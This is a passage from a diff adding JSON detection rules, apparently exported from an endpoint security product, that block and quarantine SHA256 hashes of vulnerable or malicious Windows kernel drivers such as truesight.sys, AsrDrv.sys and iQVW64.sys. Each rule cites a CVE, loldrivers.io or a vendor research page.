+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819908Z",
+ "creation_date": "2026-03-23T11:45:31.819911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbc2599da29472e0d376ee3dcd887d3b6eaedddd028f0a7eb22e78185d156ebc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea04d2f9-91af-56b9-91cf-a9e326868140",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462555Z",
+ "creation_date": "2026-03-23T11:45:30.462559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d03a01257e156a3a018230059052791c3cde556e5cec7a4dd2f55f65c06e146",
+ "comment": "Vulnerable Kernel Driver (aka AsrDrv.sys) [https://www.loldrivers.io/drivers/213676bb-ffb9-4d0d-a442-8cefee63acc1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea18466c-3020-5fcf-93ce-2927f5a8a946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823283Z",
+ "creation_date": "2026-03-23T11:45:31.823286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ef85f011947ad77f258a42705c392e9ad9de97e7b4f69f91fb124230e9218bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea1d568f-49c2-5386-998c-4d2c97bdd9a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141006Z",
+ "creation_date": "2026-03-23T11:45:31.141008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c292ad99577e588b0c252a171b5fd1e708c5f29f2625cb9c2c91077ef768e2a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea1f40be-64ac-5685-971e-b4ba12436268",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828668Z",
+ "creation_date": "2026-03-23T11:45:30.828670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d4e9ba2a651657a68ee5b97e3f648e2b3670eea824edf5a07eb39c1a6dc4beb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea21a4cc-4d9c-589c-8ab9-284c5d2fdd35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618390Z",
+ "creation_date": "2026-03-23T11:45:29.618392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea2367f4-d834-5ab0-81ed-89f0fe314e67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459793Z",
+ "creation_date": "2026-03-23T11:45:30.459797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fba2584bb4fb801f322e3a63253ffac36a76d9dc5f0a4747746b0791e2a0d0b",
+ "comment": "Vulnerable Kernel Driver (aka Driver7.sys) [https://www.loldrivers.io/drivers/9ca73d04-3349-4c16-9384-94c43335a031/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea3824d0-459e-522e-80a7-8600ae511bbb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477490Z",
+ "creation_date": "2026-03-23T11:45:30.477493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ca586b49135166eea00c6f83329a2d134152e0e9423822a51c13394265b6340",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea4e71a1-fedc-5dfa-baec-634bfd0ce84d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829301Z",
+ "creation_date": "2026-03-23T11:45:31.829305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829314Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "723b21973a67f54ac06570f3e8dabebc5feb346a478becc16093c3d76cf67200",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea4ee273-ed33-5c08-b850-cd8a2daa4ad2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144670Z",
+ "creation_date": "2026-03-23T11:45:32.144672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144678Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f43f4251be4d72dd56c91bf6cce475d379eb9ba6c4dda2be3022ea633d5e807",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea5ca6dd-98ca-5d69-ab28-6637260b6945",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816782Z",
+ "creation_date": "2026-03-23T11:45:31.816786Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816794Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a531eba3777600578d44166c38161efa9099a994fb80156ef605f4d2cd4025c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea61d637-69a7-54d6-a938-7203bd836008",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141345Z",
+ "creation_date": "2026-03-23T11:45:31.141347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d60bd5f693f32e13add78e5afb7f733fbe031afa66d93b37eb71afa3542059b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea6816bd-cf40-5d2f-b1cc-77ff5bf6792a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613989Z",
+ "creation_date": "2026-03-23T11:45:29.613991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc",
+ "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea749a9a-c1dd-59b1-a78a-75dd6502ed98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157067Z",
+ "creation_date": "2026-03-23T11:45:31.157069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3a55aba512689dcac863c407406500e51c2fc6a50235debdca38d70a174eada",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea74dc83-cace-5bb4-9440-2f62eb547b20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836717Z",
+ "creation_date": "2026-03-23T11:45:30.836720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7dbca9a9907d361d4ccf6883644fee00f5d13436bedfd27598fe07ee1683f6ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea7e0beb-6f99-5ccf-b96c-d85b5be78d10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828820Z",
+ "creation_date": "2026-03-23T11:45:31.828822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef2bcf2525e7512880825629aa38263bd8b836dfafdf2caf84963486c9be4bed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea7f9e9d-e283-5722-bd3c-8539f49b3086",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153789Z",
+ "creation_date": "2026-03-23T11:45:31.153791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153796Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8109fb3d71bf47d43e8715d5362e526cd08d023aa606eb75e39a7b2e5d3e879",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea899b1c-8c79-5514-b746-89f9c9719bac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140064Z",
+ "creation_date": "2026-03-23T11:45:31.140068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140077Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d976f2023dfabea845fea85ab7427c3293196bae53ea20efb2ba1e08fb492b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea8b8667-a624-5a33-82ea-88cae4c83610",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816099Z",
+ "creation_date": "2026-03-23T11:45:30.816101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dba8db472e51edd59f0bbaf4e09df71613d4dd26fd05f14a9bc7e3fc217a78aa",
+ "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ea91ff8d-4a04-50c2-8e29-e5f4d67e7ff5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972405Z",
+ "creation_date": "2026-03-23T11:45:29.972407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e80597ea0d75e9198428c81ca5b4495bf11922dd29852a0a2e63998e36857746",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eaa010e5-8994-5f69-a730-bbca1c3fb08d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155310Z",
+ "creation_date": "2026-03-23T11:45:31.155312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9582cac23cf8bd3a3d66c09195ab6b0389b3fe35490e3a4db97f6338dfe3948",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eab9a02f-ff01-5a0e-b710-59ec18ab51d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151469Z",
+ "creation_date": "2026-03-23T11:45:31.151472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b34749d344404ea726643fdca9c68fe7fca58bf17d2baf57afacd1f5654793c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eac1fe17-9270-5699-81aa-2a6df35254d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
